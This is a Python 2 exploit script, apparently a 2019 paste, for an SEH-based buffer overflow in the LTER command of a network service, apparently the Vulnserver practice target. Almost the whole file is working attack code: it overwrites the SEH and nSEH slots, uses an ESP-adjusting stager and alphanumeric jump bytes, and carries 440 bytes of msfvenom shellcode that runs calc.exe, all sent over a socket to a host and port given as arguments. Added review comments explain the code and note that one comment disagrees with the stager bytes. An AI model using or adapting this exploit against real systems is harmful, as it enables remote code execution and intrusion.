LTER wot??

Nov 18th, 2019
#!/usr/bin/env python
# Python 2 script: the bare `print` statements and the str-as-bytes payloads
# below do not run unmodified on Python 3.
# Usage: <script> HOST PORT.  The arguments are not validated; a missing or
# non-numeric argument raises IndexError / ValueError before any connection
# is attempted.

import socket
from struct import pack
import sys

host = sys.argv[1]
port = int(sys.argv[2])

# Value written over the SEH handler slot, packed as a 4-byte little-endian
# integer ("<I").
seh = pack("<I", 0x6250172B)
# The 4 bytes placed directly in front of it (nSEH).
nseh = "\x43\x43\x75\xff"

# Author's notes from a debugger session (addresses and offsets as the author
# observed them; not verifiable from this file):
# End of D's BEFFFF
# Beginning of A's BEF230
# First aligned A at BEF239
# A's offset: DBF (-3519 bytes)
# ESP offset from D's: 11AF (-4527 bytes)

# Stager: 8 bytes that move ESP into EAX, adjust AX, and move the result back
# into ESP (per the author's inline comments).
# NOTE(review): the immediate bytes "\x7f\x11" encode 0x117f, while the
# trailing comment says 0x1170 (4464) -- the comment and the bytes disagree.
stager = "\x54\x58" # push esp, pop eax
stager += "\x66\x05\x7f\x11" # add ax, 0x1170 | 4464 bytes
stager += "\x50\x5c" # push eax, pop esp


# This triple-quoted block is a bare string expression, not a module docstring
# (it is not the first statement), so at runtime it is an unused value --
# effectively a comment recording the instruction sequence the author intended.
"""
jmp2buff asm
nasm > mov ebx, esp
00000000  89E3              mov ebx,esp
nasm > sub bx, 0xdba
00000000  6681EBBA0D        sub bx,0xdba
nasm > sub bx, 0xd8a
00000000  6681EB8A0D        sub bx,0xd8a
nasm > push ebx
00000000  53                push ebx
nasm > pop esp
00000000  5C                pop esp
nasm > call esp
00000000  FFD4              call esp
"""

# Byte sequence standing in for the listing above; the author's inline
# comments name the instruction each chunk encodes.  Per those comments each
# group ands/adds/subs into EAX and then pushes it (73 bytes in total).
jmp2buff = ""
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
jmp2buff += "\x05\x36\x77\x63\x41" ## add  eax, 0x41637736
jmp2buff += "\x05\x35\x66\x62\x41" ## add  eax, 0x41626635
jmp2buff += "\x05\x24\x55\x42\x41" ## add  eax, 0x41425524
jmp2buff += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
jmp2buff += "\x50"                 ## push eax
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
jmp2buff += "\x05\x76\x45\x07\x32" ## add  eax, 0x32074576
jmp2buff += "\x05\x75\x45\x06\x21" ## add  eax, 0x21064575
jmp2buff += "\x50"                 ## push eax
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
jmp2buff += "\x05\x45\x72\x33\x41" ## add  eax, 0x41337245
jmp2buff += "\x05\x44\x71\x33\x40" ## add  eax, 0x40337144
jmp2buff += "\x50"                 ## push eax

# Author's generation command for the payload below (windows/exec, calc.exe):
# msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -b '\x00' -e x86/alpha_mixed BufferRegister=ESP -f c
# shellcode gets loaded into ESP, then called, and ends up dying 3/4 of the way through in a recursive SEH chain
# 440 bytes by count (15 per line for the first 29 lines, 5 on the last).

shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6d\x38\x4d\x52\x57\x70"
"\x75\x50\x35\x50\x71\x70\x6e\x69\x4a\x45\x75\x61\x49\x50\x62"
"\x44\x4e\x6b\x66\x30\x74\x70\x4c\x4b\x43\x62\x34\x4c\x6e\x6b"
"\x36\x32\x47\x64\x4e\x6b\x54\x32\x76\x48\x54\x4f\x4c\x77\x43"
"\x7a\x77\x56\x45\x61\x6b\x4f\x6c\x6c\x45\x6c\x70\x61\x43\x4c"
"\x45\x52\x56\x4c\x75\x70\x39\x51\x78\x4f\x54\x4d\x65\x51\x49"
"\x57\x68\x62\x78\x72\x36\x32\x71\x47\x4c\x4b\x52\x72\x72\x30"
"\x4e\x6b\x42\x6a\x45\x6c\x6e\x6b\x70\x4c\x52\x31\x43\x48\x6a"
"\x43\x67\x38\x55\x51\x78\x51\x52\x71\x6e\x6b\x36\x39\x65\x70"
"\x47\x71\x79\x43\x4e\x6b\x43\x79\x72\x38\x49\x73\x37\x4a\x77"
"\x39\x4e\x6b\x30\x34\x6c\x4b\x75\x51\x79\x46\x46\x51\x59\x6f"
"\x4c\x6c\x69\x51\x4a\x6f\x66\x6d\x33\x31\x6b\x77\x46\x58\x4d"
"\x30\x34\x35\x4c\x36\x33\x33\x31\x6d\x6c\x38\x45\x6b\x61\x6d"
"\x54\x64\x42\x55\x69\x74\x70\x58\x4e\x6b\x73\x68\x55\x74\x36"
"\x61\x7a\x73\x35\x36\x4c\x4b\x64\x4c\x50\x4b\x4e\x6b\x50\x58"
"\x47\x6c\x67\x71\x5a\x73\x6c\x4b\x66\x64\x6c\x4b\x47\x71\x6a"
"\x70\x4e\x69\x53\x74\x65\x74\x57\x54\x43\x6b\x31\x4b\x63\x51"
"\x50\x59\x73\x6a\x53\x61\x79\x6f\x49\x70\x71\x4f\x61\x4f\x50"
"\x5a\x6e\x6b\x46\x72\x78\x6b\x6e\x6d\x73\x6d\x51\x7a\x46\x61"
"\x6c\x4d\x4f\x75\x4e\x52\x77\x70\x67\x70\x65\x50\x42\x70\x50"
"\x68\x36\x51\x6e\x6b\x70\x6f\x6b\x37\x69\x6f\x48\x55\x6f\x4b"
"\x49\x70\x37\x6d\x54\x6a\x34\x4a\x31\x78\x4d\x76\x4a\x35\x4f"
"\x4d\x4d\x4d\x59\x6f\x6b\x65\x65\x6c\x34\x46\x43\x4c\x75\x5a"
"\x4f\x70\x49\x6b\x6b\x50\x33\x45\x63\x35\x6f\x4b\x62\x67\x47"
"\x63\x44\x32\x30\x6f\x62\x4a\x67\x70\x51\x43\x79\x6f\x78\x55"
"\x71\x73\x61\x71\x30\x6c\x52\x43\x34\x6e\x42\x45\x54\x38\x73"
"\x55\x63\x30\x41\x41")

# Author's overflow notes (offsets are counted from the first 'A' that follows
# the "LTER /.:/" prefix):
# Overflowed with lter.spk "LTER /.:/(3520 A's)"
# NSEH overwritten at 3495
# SEH overwritten at 3499

# Request layout.  The padding counts are tied to the offsets noted above, so
# changing the length of any component shifts where nseh and seh land.
# `buffer` shadows the Python 2 builtin of the same name.
# On the wire this is one "LTER /.:/" request whose body is dominated by long
# runs of 'A' and 'D' filler -- the fixed prefix plus that padding pattern is
# what makes the request easy to recognise in a traffic capture.
buffer = "LTER /.:/"
buffer += "A"*4
buffer += shellcode
buffer += "A"*2927
buffer += stager
buffer += jmp2buff
buffer += "A"*43
buffer += nseh
buffer += seh
buffer += "D"*(1000-len(nseh)-len(seh))  # 992 bytes of trailing filler (nseh and seh are 4 bytes each)

try:
    print "[+] Connecting to target"
    # No timeout is set, so connect()/recv() below can block indefinitely.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.recv(1024)  # read and discard up to 1024 bytes before sending
    # Printed before send() runs, so the message appears even if send() fails.
    print "[+] Sent payload with length: %d" % len(buffer)
    s.send(buffer)  # send() may write fewer than len(buffer) bytes; the return value is not checked
    s.close()  # only reached on the success path: there is no finally, so the socket is not closed on error
except:
    # Bare except: also swallows KeyboardInterrupt/SystemExit and hides the
    # real cause (unreachable host, refused connection, reset during send...).
    print "[-] Something went wrong :("